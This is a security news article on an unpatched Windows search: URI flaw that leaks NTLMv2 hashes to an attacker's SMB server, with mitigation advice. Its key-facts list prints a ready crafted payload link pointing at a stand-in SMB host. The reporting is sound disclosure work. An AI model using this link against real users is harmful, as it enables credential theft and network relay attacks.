Cybersecurity researchers said in a technical analysis that an unpatched flaw in Windows search: URI handling could expose a user’s NTLMv2 hash through a crafted link, after Microsoft declined to fix the issue in April 2026.
KEY FACTS
- Issue The search: URI handler can be used to trigger NTLM authentication to an attacker-controlled SMB server.
- Payload A crafted link can use search:query=test&crumb=location:\10.0.1.100\share to cause the leak.
- Impact Captured Net-NTLMv2 hashes could be used in relay attacks to move deeper into a network.
- Status Microsoft said only Important and Critical cases meet its bar for servicing.
The disclosure said the flaw works in a similar way to CVE-2026-33829, which affected the Windows Snipping Tool’s ms-screensketch: URI handler and was patched in April 2026. In that case, Microsoft said a specially crafted link could make a computer connect to an SMB server chosen by the attacker and reveal the user’s NTLMv2 hash.
Huntress researcher Andrew Schwartz said the search: issue used the same NTLM leakage mechanism, had the same prerequisites, and carried the same Moderate rating. The command shown in the disclosure used a crumb=location: parameter to point to a UNC path and trigger authentication.
The report also noted that a similar hash-leak technique using a crumb parameter was documented in connection with CVE-2023-35636 in 2024. Microsoft did not address the newly disclosed issue after responsible disclosure on April 15, 2026, according to the report.
In the absence of a fix, the report advised blocking outbound SMB on hosts that do not need it, enforcing SMB signing and disabling NTLM where possible.
WHY IT MATTERS
The issue could let an attacker capture credentials without malware if a user clicks a crafted link. That raises the risk of relay attacks and lateral movement inside networks, especially where SMB is exposed and NTLM is still allowed.